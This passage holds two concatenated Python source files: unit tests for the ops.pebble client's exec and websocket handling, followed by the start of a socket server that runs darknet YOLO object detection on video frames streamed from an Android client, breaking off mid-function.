client = pebble.Client(socket_path=socket_path)
info = client.get_system_info()
self.assertEqual(info.version, '3.14.159')
change_id = client.start_services(['foo'], timeout=0)
self.assertEqual(change_id, '1234')
with self.assertRaises(pebble.APIError) as cm:
client.start_services(['bar'], timeout=0)
self.assertIsInstance(cm.exception, pebble.Error)
self.assertEqual(cm.exception.code, 400)
self.assertEqual(cm.exception.status, 'Bad Request')
self.assertEqual(cm.exception.message, 'service "bar" does not exist')
finally:
shutdown()
class TestExecError(unittest.TestCase):
def test_init(self):
e = pebble.ExecError(['foo'], 42, 'out', 'err')
self.assertEqual(e.command, ['foo'])
self.assertEqual(e.exit_code, 42)
self.assertEqual(e.stdout, 'out')
self.assertEqual(e.stderr, 'err')
def test_str(self):
e = pebble.ExecError(['x'], 1, None, None)
self.assertEqual(str(e), "non-zero exit code 1 executing ['x']")
e = pebble.ExecError(['x'], 1, 'only-out', None)
self.assertEqual(str(e), "non-zero exit code 1 executing ['x'], stdout='only-out'")
e = pebble.ExecError(['x'], 1, None, 'only-err')
self.assertEqual(str(e), "non-zero exit code 1 executing ['x'], stderr='only-err'")
e = pebble.ExecError(['a', 'b'], 1, 'out', 'err')
self.assertEqual(str(e), "non-zero exit code 1 executing ['a', 'b'], "
+ "stdout='out', stderr='err'")
def test_str_truncated(self):
e = pebble.ExecError(['foo'], 2, 'longout', 'longerr')
e.STR_MAX_OUTPUT = 5
self.assertEqual(str(e), "non-zero exit code 2 executing ['foo'], "
+ "stdout='longo' [truncated], stderr='longe' [truncated]")
class MockWebsocket:
def __init__(self):
self.sends = []
self.receives = []
def send_binary(self, b):
self.sends.append(('BIN', b))
def send(self, s):
self.sends.append(('TXT', s))
def recv(self):
return self.receives.pop(0)
def shutdown(self):
pass
class TestExec(unittest.TestCase):
def setUp(self):
self.client = MockClient()
self.time = MockTime()
time_patcher = unittest.mock.patch('ops.pebble.time', self.time)
time_patcher.start()
self.addCleanup(time_patcher.stop)
def add_responses(self, change_id, exit_code, change_err=None):
task_id = 'T' + change_id # create a task_id based on change_id
self.client.responses.append({
'change': change_id,
'result': {'task-id': task_id},
})
change = build_mock_change_dict(change_id)
change['tasks'][0]['data'] = {'exit-code': exit_code}
if change_err is not None:
change['err'] = change_err
self.client.responses.append({
'result': change,
})
stdio = MockWebsocket()
stderr = MockWebsocket()
control = MockWebsocket()
self.client.websockets = {
(task_id, 'stdio'): stdio,
(task_id, 'stderr'): stderr,
(task_id, 'control'): control,
}
return (stdio, stderr, control)
def build_exec_data(
self, command, environment=None, working_dir=None, timeout=None,
user_id=None, user=None, group_id=None, group=None, combine_stderr=False):
return {
'command': command,
'environment': environment or {},
'working-dir': working_dir,
'timeout': '{:.3f}s'.format(timeout) if timeout is not None else None,
'user-id': user_id,
'user': user,
'group-id': group_id,
'group': group,
'split-stderr': not combine_stderr,
}
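    # For reference, exec(['ls', '-l'], timeout=2.5) is expected to produce a
    # request body of this shape, per build_exec_data above (a sketch, not the
    # authoritative wire format):
    #
    #   {
    #       'command': ['ls', '-l'],
    #       'environment': {},
    #       'working-dir': None,
    #       'timeout': '2.500s',
    #       'user-id': None, 'user': None, 'group-id': None, 'group': None,
    #       'split-stderr': True,
    #   }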
def test_arg_errors(self):
with self.assertRaises(TypeError):
self.client.exec('foo')
with self.assertRaises(ValueError):
self.client.exec([])
with self.assertRaises(ValueError):
self.client.exec(['foo'], stdin='s', encoding=None)
with self.assertRaises(ValueError):
self.client.exec(['foo'], stdin=b's')
with self.assertRaises(TypeError):
self.client.exec(['foo'], stdin=123)
with self.assertRaises(ValueError):
self.client.exec(['foo'], stdout=io.StringIO(), stderr=io.StringIO(),
combine_stderr=True)
def test_no_wait_call(self):
self.add_responses('123', 0)
with self.assertWarns(ResourceWarning) as cm:
process = self.client.exec(['true'])
del process
self.assertEqual(str(cm.warning), 'ExecProcess instance garbage collected '
+ 'without call to wait() or wait_output()')
def test_wait_exit_zero(self):
self.add_responses('123', 0)
process = self.client.exec(['true'])
self.assertIsNotNone(process.stdout)
self.assertIsNotNone(process.stderr)
process.wait()
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, self.build_exec_data(['true'])),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
def test_wait_exit_nonzero(self):
self.add_responses('456', 1)
process = self.client.exec(['false'])
with self.assertRaises(pebble.ExecError) as cm:
process.wait()
self.assertEqual(cm.exception.command, ['false'])
self.assertEqual(cm.exception.exit_code, 1)
self.assertEqual(cm.exception.stdout, None)
self.assertEqual(cm.exception.stderr, None)
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, self.build_exec_data(['false'])),
('GET', '/v1/changes/456/wait', {'timeout': '4.000s'}, None),
])
def test_wait_timeout(self):
self.add_responses('123', 0)
process = self.client.exec(['true'], timeout=2)
process.wait()
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, self.build_exec_data(['true'], timeout=2)),
('GET', '/v1/changes/123/wait', {'timeout': '3.000s'}, None),
])
def test_wait_other_args(self):
self.add_responses('123', 0)
process = self.client.exec(
['true'],
environment={'K1': 'V1', 'K2': 'V2'},
working_dir='WD',
user_id=1000,
user='bob',
group_id=1000,
group='staff',
)
process.wait()
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, self.build_exec_data(
command=['true'],
environment={'K1': 'V1', 'K2': 'V2'},
working_dir='WD',
user_id=1000,
user='bob',
group_id=1000,
group='staff',
)),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
def test_wait_change_error(self):
self.add_responses('123', 0, change_err='change error!')
process = self.client.exec(['true'])
with self.assertRaises(pebble.ChangeError) as cm:
process.wait()
self.assertEqual(cm.exception.err, 'change error!')
self.assertEqual(cm.exception.change.id, '123')
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, self.build_exec_data(['true'])),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
def test_send_signal(self):
_, _, control = self.add_responses('123', 0)
process = self.client.exec(['server'])
process.send_signal('SIGHUP')
num_sends = 1
if hasattr(signal, 'SIGHUP'): # Skip this part on Windows
process.send_signal(1)
process.send_signal(signal.SIGHUP)
num_sends += 2
process.wait()
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, self.build_exec_data(['server'])),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
self.assertEqual(len(control.sends), num_sends)
self.assertEqual(control.sends[0][0], 'TXT')
self.assertEqual(json.loads(control.sends[0][1]),
{'command': 'signal', 'signal': {'name': 'SIGHUP'}})
if hasattr(signal, 'SIGHUP'):
self.assertEqual(control.sends[1][0], 'TXT')
self.assertEqual(json.loads(control.sends[1][1]),
{'command': 'signal', 'signal': {'name': signal.Signals(1).name}})
self.assertEqual(control.sends[2][0], 'TXT')
self.assertEqual(json.loads(control.sends[2][1]),
{'command': 'signal', 'signal': {'name': 'SIGHUP'}})
def test_wait_output(self):
stdio, stderr, _ = self.add_responses('123', 0)
stdio.receives.append(b'Python 3.8.10\n')
stdio.receives.append('{"command":"end"}')
stderr.receives.append('{"command":"end"}')
process = self.client.exec(['python3', '--version'])
out, err = process.wait_output()
self.assertEqual(out, 'Python 3.8.10\n')
self.assertEqual(err, '')
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, self.build_exec_data(['python3', '--version'])),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
self.assertEqual(stdio.sends, [])
def test_wait_output_combine_stderr(self):
stdio, _, _ = self.add_responses('123', 0)
stdio.receives.append(b'invalid time interval\n')
stdio.receives.append('{"command":"end"}')
process = self.client.exec(['sleep', 'x'], combine_stderr=True)
out, err = process.wait_output()
self.assertEqual(out, 'invalid time interval\n')
self.assertIsNone(err)
self.assertIsNone(process.stderr)
exec_data = self.build_exec_data(['sleep', 'x'], combine_stderr=True)
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, exec_data),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
self.assertEqual(stdio.sends, [])
def test_wait_output_bytes(self):
stdio, stderr, _ = self.add_responses('123', 0)
stdio.receives.append(b'Python 3.8.10\n')
stdio.receives.append('{"command":"end"}')
stderr.receives.append('{"command":"end"}')
process = self.client.exec(['python3', '--version'], encoding=None)
out, err = process.wait_output()
self.assertEqual(out, b'Python 3.8.10\n')
self.assertEqual(err, b'')
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, self.build_exec_data(['python3', '--version'])),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
self.assertEqual(stdio.sends, [])
def test_wait_output_exit_nonzero(self):
stdio, stderr, _ = self.add_responses('123', 0)
stdio.receives.append('{"command":"end"}')
stderr.receives.append(b'file not found: x\n')
stderr.receives.append('{"command":"end"}')
process = self.client.exec(['ls', 'x'])
out, err = process.wait_output()
self.assertEqual(out, '')
self.assertEqual(err, 'file not found: x\n')
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, self.build_exec_data(['ls', 'x'])),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
self.assertEqual(stdio.sends, [])
def test_wait_output_exit_nonzero_combine_stderr(self):
stdio, _, _ = self.add_responses('123', 0)
stdio.receives.append(b'file not found: x\n')
stdio.receives.append('{"command":"end"}')
process = self.client.exec(['ls', 'x'], combine_stderr=True)
out, err = process.wait_output()
self.assertEqual(out, 'file not found: x\n')
self.assertIsNone(err)
exec_data = self.build_exec_data(['ls', 'x'], combine_stderr=True)
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, exec_data),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
self.assertEqual(stdio.sends, [])
def test_wait_output_send_stdin(self):
stdio, stderr, _ = self.add_responses('123', 0)
stdio.receives.append(b'FOO\nBAR\n')
stdio.receives.append('{"command":"end"}')
stderr.receives.append('{"command":"end"}')
process = self.client.exec(['awk', '{ print toupper($) }'], stdin='foo\nbar\n')
out, err = process.wait_output()
self.assertEqual(out, 'FOO\nBAR\n')
self.assertEqual(err, '')
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, self.build_exec_data(['awk', '{ print toupper($) }'])),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
self.assertEqual(stdio.sends, [
('BIN', b'foo\nbar\n'),
('TXT', '{"command":"end"}'),
])
def test_wait_output_send_stdin_bytes(self):
stdio, stderr, _ = self.add_responses('123', 0)
stdio.receives.append(b'FOO\nBAR\n')
stdio.receives.append('{"command":"end"}')
stderr.receives.append('{"command":"end"}')
process = self.client.exec(['awk', '{ print toupper($) }'], stdin=b'foo\nbar\n',
encoding=None)
out, err = process.wait_output()
self.assertEqual(out, b'FOO\nBAR\n')
self.assertEqual(err, b'')
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, self.build_exec_data(['awk', '{ print toupper($) }'])),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
self.assertEqual(stdio.sends, [
('BIN', b'foo\nbar\n'),
('TXT', '{"command":"end"}'),
])
def test_wait_output_bad_command(self):
stdio, stderr, _ = self.add_responses('123', 0)
stdio.receives.append(b'Python 3.8.10\n')
stdio.receives.append('not json') # bad JSON should be ignored
stdio.receives.append('{"command":"foo"}') # unknown command should be ignored
stdio.receives.append('{"command":"end"}')
stderr.receives.append('{"command":"end"}')
with self.assertLogs('ops.pebble', level='WARNING') as cm:
process = self.client.exec(['python3', '--version'])
out, err = process.wait_output()
self.assertEqual(cm.output, [
"WARNING:ops.pebble:Cannot decode I/O command (invalid JSON)",
"WARNING:ops.pebble:Invalid I/O command 'foo'",
])
self.assertEqual(out, 'Python 3.8.10\n')
self.assertEqual(err, '')
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, self.build_exec_data(['python3', '--version'])),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
self.assertEqual(stdio.sends, [])
def test_wait_passed_output(self):
io_ws, stderr, _ = self.add_responses('123', 0)
io_ws.receives.append(b'foo\n')
io_ws.receives.append('{"command":"end"}')
stderr.receives.append(b'some error\n')
stderr.receives.append('{"command":"end"}')
out = io.StringIO()
err = io.StringIO()
process = self.client.exec(['echo', 'foo'], stdout=out, stderr=err)
process.wait()
self.assertEqual(out.getvalue(), 'foo\n')
self.assertEqual(err.getvalue(), 'some error\n')
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, self.build_exec_data(['echo', 'foo'])),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
self.assertEqual(io_ws.sends, [])
def test_wait_passed_output_combine_stderr(self):
io_ws, _, _ = self.add_responses('123', 0)
io_ws.receives.append(b'foo\n')
io_ws.receives.append(b'some error\n')
io_ws.receives.append('{"command":"end"}')
out = io.StringIO()
process = self.client.exec(['echo', 'foo'], stdout=out, combine_stderr=True)
process.wait()
self.assertEqual(out.getvalue(), 'foo\nsome error\n')
self.assertIsNone(process.stderr)
exec_data = self.build_exec_data(['echo', 'foo'], combine_stderr=True)
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, exec_data),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
self.assertEqual(io_ws.sends, [])
def test_wait_passed_output_bytes(self):
io_ws, stderr, _ = self.add_responses('123', 0)
io_ws.receives.append(b'foo\n')
io_ws.receives.append('{"command":"end"}')
stderr.receives.append(b'some error\n')
stderr.receives.append('{"command":"end"}')
out = io.BytesIO()
err = io.BytesIO()
process = self.client.exec(['echo', 'foo'], stdout=out, stderr=err, encoding=None)
process.wait()
self.assertEqual(out.getvalue(), b'foo\n')
self.assertEqual(err.getvalue(), b'some error\n')
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, self.build_exec_data(['echo', 'foo'])),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
self.assertEqual(io_ws.sends, [])
def test_wait_passed_output_bad_command(self):
io_ws, stderr, _ = self.add_responses('123', 0)
io_ws.receives.append(b'foo\n')
io_ws.receives.append('not json') # bad JSON should be ignored
io_ws.receives.append('{"command":"foo"}') # unknown command should be ignored
io_ws.receives.append('{"command":"end"}')
stderr.receives.append(b'some error\n')
stderr.receives.append('{"command":"end"}')
out = io.StringIO()
err = io.StringIO()
with self.assertLogs('ops.pebble', level='WARNING') as cm:
process = self.client.exec(['echo', 'foo'], stdout=out, stderr=err)
process.wait()
self.assertEqual(cm.output, [
"WARNING:ops.pebble:Cannot decode I/O command (invalid JSON)",
"WARNING:ops.pebble:Invalid I/O command 'foo'",
])
self.assertEqual(out.getvalue(), 'foo\n')
self.assertEqual(err.getvalue(), 'some error\n')
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, self.build_exec_data(['echo', 'foo'])),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
self.assertEqual(io_ws.sends, [])
@unittest.skipIf(sys.platform == 'win32', "exec() with files doesn't work on Windows")
def test_wait_file_io(self):
fin = tempfile.TemporaryFile(mode='w+', encoding='utf-8')
out = tempfile.TemporaryFile(mode='w+', encoding='utf-8')
err = tempfile.TemporaryFile(mode='w+', encoding='utf-8')
try:
fin.write('foo\n')
fin.seek(0)
io_ws, stderr, _ = self.add_responses('123', 0)
io_ws.receives.append(b'foo\n')
io_ws.receives.append('{"command":"end"}')
stderr.receives.append(b'some error\n')
stderr.receives.append('{"command":"end"}')
process = self.client.exec(['echo', 'foo'], stdin=fin, stdout=out, stderr=err)
process.wait()
out.seek(0)
self.assertEqual(out.read(), 'foo\n')
err.seek(0)
self.assertEqual(err.read(), 'some error\n')
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, self.build_exec_data(['echo', 'foo'])),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
self.assertEqual(io_ws.sends, [
('BIN', b'foo\n'),
('TXT', '{"command":"end"}'),
])
finally:
fin.close()
out.close()
err.close()
def test_wait_returned_io(self):
stdio, stderr, _ = self.add_responses('123', 0)
stdio.receives.append(b'FOO BAR\n')
stdio.receives.append(b'BAZZ\n')
stdio.receives.append('{"command":"end"}')
process = self.client.exec(['awk', '{ print toupper($) }'])
process.stdin.write('Foo Bar\n')
self.assertEqual(process.stdout.read(4), 'FOO ')
process.stdin.write('bazz\n')
self.assertEqual(process.stdout.read(), 'BAR\nBAZZ\n')
process.stdin.close()
self.assertEqual(process.stdout.read(), '')
process.wait()
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, self.build_exec_data(['awk', '{ print toupper($) }'])),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
self.assertEqual(stdio.sends, [
('BIN', b'Foo Bar\nbazz\n'), # TextIOWrapper groups the writes together
('TXT', '{"command":"end"}'),
])
def test_wait_returned_io_bytes(self):
stdio, stderr, _ = self.add_responses('123', 0)
stdio.receives.append(b'FOO BAR\n')
stdio.receives.append(b'BAZZ\n')
stdio.receives.append('{"command":"end"}')
process = self.client.exec(['awk', '{ print toupper($) }'], encoding=None)
process.stdin.write(b'Foo Bar\n')
self.assertEqual(process.stdout.read(4), b'FOO ')
self.assertEqual(process.stdout.read(), b'BAR\n')
process.stdin.write(b'bazz\n')
self.assertEqual(process.stdout.read(), b'BAZZ\n')
process.stdin.close()
self.assertEqual(process.stdout.read(), b'')
process.wait()
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, self.build_exec_data(['awk', '{ print toupper($) }'])),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
self.assertEqual(stdio.sends, [
('BIN', b'Foo Bar\n'),
('BIN', b'bazz\n'),
('TXT', '{"command":"end"}'),
])
def test_connect_websocket_error(self):
class Client(MockClient):
def _connect_websocket(self, change_id, websocket_id):
raise websocket.WebSocketException('conn!')
self.client = Client()
self.add_responses('123', 0, change_err='change error!')
with self.assertRaises(pebble.ChangeError) as cm:
self.client.exec(['foo'])
self.assertEqual(str(cm.exception), 'change error!')
self.client = Client()
self.add_responses('123', 0)
with self.assertRaises(pebble.ConnectionError) as cm:
self.client.exec(['foo'])
        self.assertIn('unexpected error connecting to websockets: conn!', str(cm.exception))
def test_websocket_send_raises(self):
stdio, stderr, _ = self.add_responses('123', 0)
raised = False
def send_binary(b):
nonlocal raised
raised = True
raise Exception('a simulated error!')
stdio.send_binary = send_binary
stdio.receives.append('{"command":"end"}')
stderr.receives.append('{"command":"end"}')
process = self.client.exec(['cat'], stdin='foo\nbar\n')
out, err = process.wait_output()
self.assertEqual(out, '')
self.assertEqual(err, '')
self.assertTrue(raised)
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, self.build_exec_data(['cat'])),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
self.assertEqual(stdio.sends, [])
# You'd normally use pytest.mark.filterwarnings as a decorator, but
# PytestUnhandledThreadExceptionWarning isn't present on older Python versions.
if hasattr(pytest, 'PytestUnhandledThreadExceptionWarning'):
test_websocket_send_raises = pytest.mark.filterwarnings(
'ignore::pytest.PytestUnhandledThreadExceptionWarning')(test_websocket_send_raises)
def test_websocket_recv_raises(self):
stdio, stderr, _ = self.add_responses('123', 0)
raised = False
def recv():
nonlocal raised
raised = True
raise Exception('a simulated error!')
stdio.recv = recv
stderr.receives.append('{"command":"end"}')
process = self.client.exec(['cat'], stdin='foo\nbar\n')
out, err = process.wait_output()
self.assertEqual(out, '')
self.assertEqual(err, '')
self.assertTrue(raised)
self.assertEqual(self.client.requests, [
('POST', '/v1/exec', None, self.build_exec_data(['cat'])),
('GET', '/v1/changes/123/wait', {'timeout': '4.000s'}, None),
])
self.assertEqual(stdio.sends, [
('BIN', b'foo\nbar\n'),
('TXT', '{"command":"end"}'),
])
if hasattr(pytest, 'PytestUnhandledThreadExceptionWarning'):
test_websocket_recv_raises = pytest.mark.filterwarnings(
'ignore::pytest.PytestUnhandledThreadExceptionWarning')(test_websocket_recv_raises)
# Set the RUN_REAL_PEBBLE_TESTS environment variable to run these tests
# against a real Pebble server. For example, in one terminal, run Pebble:
#
# $ PEBBLE=~/pebble pebble run
# 2021-09-20T04:10:34.934Z [pebble] Started daemon
#
# In another terminal, run the tests:
#
# $ source .tox/unit/bin/activate
# $ RUN_REAL_PEBBLE_TESTS=1 PEBBLE=~/pebble pytest test/test_pebble.py -v -k RealPebble
# $ deactivate
#
@unittest.skipUnless(os.getenv('RUN_REAL_PEBBLE_TESTS'), 'RUN_REAL_PEBBLE_TESTS not set')
class TestRealPebble(unittest.TestCase):
def setUp(self):
socket_path = os.getenv('PEBBLE_SOCKET')
if not socket_path and os.getenv('PEBBLE'):
socket_path = os.path.join(os.getenv('PEBBLE'), '.pebble.socket')
assert socket_path, 'PEBBLE or PEBBLE_SOCKET must be set if RUN_REAL_PEBBLE_TESTS set'
self.client = pebble.Client(socket_path=socket_path)
def test_exec_wait(self):
process = self.client.exec(['true'])
process.wait()
with self.assertRaises(pebble.ExecError) as cm:
process = self.client.exec(['/bin/sh', '-c', 'exit 42'])
process.wait()
self.assertEqual(cm.exception.exit_code, 42)
def test_exec_wait_output(self):
process = self.client.exec(['/bin/sh', '-c', 'echo OUT; echo ERR >&2'])
out, err = process.wait_output()
self.assertEqual(out, 'OUT\n')
self.assertEqual(err, 'ERR\n')
process = self.client.exec(['/bin/sh', '-c', 'echo OUT; echo ERR >&2'], encoding=None)
out, err = process.wait_output()
self.assertEqual(out, b'OUT\n')
self.assertEqual(err, b'ERR\n')
with self.assertRaises(pebble.ExecError) as cm:
process = self.client.exec(['/bin/sh', '-c', 'echo OUT; echo ERR >&2; exit 42'])
process.wait_output()
self.assertEqual(cm.exception.exit_code, 42)
self.assertEqual(cm.exception.stdout, 'OUT\n')
self.assertEqual(cm.exception.stderr, 'ERR\n')
def test_exec_send_stdin(self):
process = self.client.exec(['awk', '{ print toupper($0) }'], stdin='foo\nBar\n')
out, err = process.wait_output()
self.assertEqual(out, 'FOO\nBAR\n')
self.assertEqual(err, '')
process = self.client.exec(['awk', '{ print toupper($0) }'], stdin=b'foo\nBar\n',
encoding=None)
out, err = process.wait_output()
self.assertEqual(out, b'FOO\nBAR\n')
self.assertEqual(err, b'')
def test_exec_timeout(self):
process = self.client.exec(['sleep', '0.2'], timeout=0.1)
with self.assertRaises(pebble.ChangeError) as cm:
process.wait()
self.assertIn('timed out', cm.exception.err)
def test_exec_working_dir(self):
with tempfile.TemporaryDirectory() as temp_dir:
process = self.client.exec(['pwd'], working_dir=temp_dir)
out, err = process.wait_output()
self.assertEqual(out, temp_dir + '\n')
self.assertEqual(err, '')
def test_exec_environment(self):
process = self.client.exec(['/bin/sh', '-c', 'echo $ONE.$TWO.$THREE'],
environment={'ONE': '1', 'TWO': '2'})
out, err = process.wait_output()
self.assertEqual(out, '1.2.\n')
self.assertEqual(err, '')
def test_exec_streaming(self):
process = self.client.exec(['cat'])
def stdin_thread():
try:
for line in ['one\n', '2\n', 'THREE\n']:
process.stdin.write(line)
process.stdin.flush()
time.sleep(0.1)
finally:
process.stdin.close()
threading.Thread(target=stdin_thread).start()
reads = []
for line in process.stdout:
reads.append(line)
process.wait()
self.assertEqual(reads, ['one\n', '2\n', 'THREE\n'])
def test_exec_streaming_bytes(self):
process = self.client.exec(['cat'], encoding=None)
def stdin_thread():
try:
for line in [b'one\n', b'2\n', b'THREE\n']:
process.stdin.write(line)
process.stdin.flush()
time.sleep(0.1)
finally:
process.stdin.close()
threading.Thread(target=stdin_thread).start()
reads = []
for line in process.stdout:
reads.append(line)
process.wait()
self.assertEqual(reads, [b'one\n', b'2\n', b'THREE\n'])
|
server.py
|
#!/usr/bin/env python3
'''
Receive a video stream from an Android client,
run YOLO (darknet) object detection on each frame,
and return a message to the mobile device.
'''
from ctypes import *
import math
import random
import os
import socket
import time
import cv2
import numpy as np
from PIL import Image
import sys
import pickle
import struct
import timeit
import threading
import ctypes
# generate different colors for different classes
COLORS = np.random.uniform(0, 255, size=(80,3))
def sample(probs):
s = sum(probs)
probs = [a/s for a in probs]
r = random.uniform(0, 1)
for i in range(len(probs)):
r = r - probs[i]
if r <= 0:
return i
return len(probs)-1
def c_array(ctype, values):
arr = (ctype*len(values))()
arr[:] = values
return arr
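# Example (illustrative only): c_array(c_float, [0.1, 0.2, 0.7]) builds a
# ctypes float[3] array that can be passed wherever darknet expects a float*.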
class BOX(Structure):
_fields_ = [("x", c_float),
("y", c_float),
("w", c_float),
("h", c_float)]
class DETECTION(Structure):
_fields_ = [("bbox", BOX),
("classes", c_int),
("prob", POINTER(c_float)),
("mask", POINTER(c_float)),
("objectness", c_float),
("sort_class", c_int)]
class IMAGE(Structure):
_fields_ = [("w", c_int),
("h", c_int),
("c", c_int),
("data", POINTER(c_float))]
class METADATA(Structure):
_fields_ = [("classes", c_int),
("names", POINTER(c_char_p))]
lib = CDLL("/home/vYOLO/libdarknet.so", RTLD_GLOBAL)
lib.network_width.argtypes = [c_void_p]
lib.network_width.restype = c_int
lib.network_height.argtypes = [c_void_p]
lib.network_height.restype = c_int
predict = lib.network_predict
predict.argtypes = [c_void_p, POINTER(c_float)]
predict.restype = POINTER(c_float)
set_gpu = lib.cuda_set_device
set_gpu.argtypes = [c_int]
make_image = lib.make_image
make_image.argtypes = [c_int, c_int, c_int]
make_image.restype = IMAGE
get_network_boxes = lib.get_network_boxes
get_network_boxes.argtypes = [c_void_p, c_int, c_int, c_float, c_float, POINTER(c_int), c_int, POINTER(c_int)]
get_network_boxes.restype = POINTER(DETECTION)
make_network_boxes = lib.make_network_boxes
make_network_boxes.argtypes = [c_void_p]
make_network_boxes.restype = POINTER(DETECTION)
free_detections = lib.free_detections
free_detections.argtypes = [POINTER(DETECTION), c_int]
free_ptrs = lib.free_ptrs
free_ptrs.argtypes = [POINTER(c_void_p), c_int]
network_predict = lib.network_predict
network_predict.argtypes = [c_void_p, POINTER(c_float)]
reset_rnn = lib.reset_rnn
reset_rnn.argtypes = [c_void_p]
load_net = lib.load_network
load_net.argtypes = [c_char_p, c_char_p, c_int]
load_net.restype = c_void_p
do_nms_obj = lib.do_nms_obj
do_nms_obj.argtypes = [POINTER(DETECTION), c_int, c_int, c_float]
do_nms_sort = lib.do_nms_sort
do_nms_sort.argtypes = [POINTER(DETECTION), c_int, c_int, c_float]
free_image = lib.free_image
free_image.argtypes = [IMAGE]
letterbox_image = lib.letterbox_image
letterbox_image.argtypes = [IMAGE, c_int, c_int]
letterbox_image.restype = IMAGE
load_meta = lib.get_metadata
lib.get_metadata.argtypes = [c_char_p]
lib.get_metadata.restype = METADATA
load_image = lib.load_image_color
load_image.argtypes = [c_char_p, c_int, c_int]
load_image.restype = IMAGE
rgbgr_image = lib.rgbgr_image
rgbgr_image.argtypes = [IMAGE]
predict_image = lib.network_predict_image
predict_image.argtypes = [c_void_p, IMAGE, c_int]
predict_image.restype = POINTER(c_float)
#def classify(net, meta, im):
# out = predict_image(net, im)
# res = []
# for i in range(meta.classes):
# res.append((meta.names[i], out[i]))
# res = sorted(res, key=lambda x: -x[1])
# return res
### modified ###
HOST=''
USER_PORT=9001
CTL_PORT=11111
BUFFER_SIZE = 256   # number of doubles exchanged with the controller per message
QUATO = 100         # GPU virtual resource quota, updated by the controller
num_points = 2      # latency samples to collect before reporting a mean
wait_time = 0.01    # polling interval while waiting for samples (seconds)
Latency = []        # per-frame detection latencies (seconds)
Count = 0
def threading_controller(controller):
global QUATO
global Latency
print ("entered controller threading.", controller)
while True:
recv_data = controller.recv(ctypes.sizeof(ctypes.c_double)*BUFFER_SIZE)
if len(recv_data)<=0: break
        data = np.frombuffer(recv_data, dtype=np.double)  # np.fromstring is deprecated
#print(data)
QUATO = int(data[0])
print('GPU virtual resource is ' + str(QUATO))
Latency = []
        while len(Latency) < num_points:
            time.sleep(wait_time)
        assert len(Latency) >= num_points  # make sure Latency holds enough samples
send_data = np.mean(Latency[1:]) * np.ones(BUFFER_SIZE, dtype=np.double)
#try to send data, if error break
controller.sendall(send_data)
# if controller drop, then close and re-accept
controller.close()
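# For reference, a controller peer is expected to mirror the exchange above:
# send BUFFER_SIZE doubles whose first element is the new quota, then read back
# BUFFER_SIZE doubles whose elements all hold the mean latency. A minimal
# sketch (the function name and lack of error handling are assumptions):
def controller_probe(sock, quota):
    sock.sendall(np.full(BUFFER_SIZE, quota, dtype=np.double).tobytes())
    reply = sock.recv(ctypes.sizeof(ctypes.c_double) * BUFFER_SIZE)
    return float(np.frombuffer(reply, dtype=np.double)[0])  # mean latency (s)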
def connect_controller():
ctl = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
ctl.bind((HOST, CTL_PORT))
ctl.listen(10)
print('Controller Socket now listening')
while True:
controller, ctl_addr = ctl.accept()
print("Get new controller socket" + str(ctl_addr))
        # Start a handler thread for this controller connection
        handler = threading.Thread(target=threading_controller, args=(controller,))
        handler.start()
def recv_image_from_socket(client):
    # Read the 4-byte big-endian length prefix
    buffers = b''
    while len(buffers) < 4:
        try:
            buf = client.recv(4 - len(buffers))
        except OSError:
            return False
        if not buf:  # connection closed
            return False
        buffers += buf
    size, = struct.unpack('!i', buffers)
    # Read exactly `size` bytes of JPEG data; capping recv() at the remaining
    # byte count keeps the next frame's length prefix out of this buffer
    recv_data = b''
    while len(recv_data) < size:
        try:
            data = client.recv(min(1024, size - len(recv_data)))
        except OSError:
            return False
        if not data:  # connection closed mid-frame
            return False
        recv_data += data
    imgdata = np.frombuffer(recv_data, dtype='uint8')  # np.fromstring is deprecated
    decimg = cv2.imdecode(imgdata, 1)
    return decimg
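# The matching sender for this length-prefixed JPEG framing would look roughly
# like the sketch below (the function name and JPEG quality are assumptions,
# not part of the original protocol code):
def send_image_to_socket(sock, frame):
    ok, encoded = cv2.imencode('.jpg', frame, [int(cv2.IMWRITE_JPEG_QUALITY), 90])
    if not ok:
        return False
    data = encoded.tobytes()
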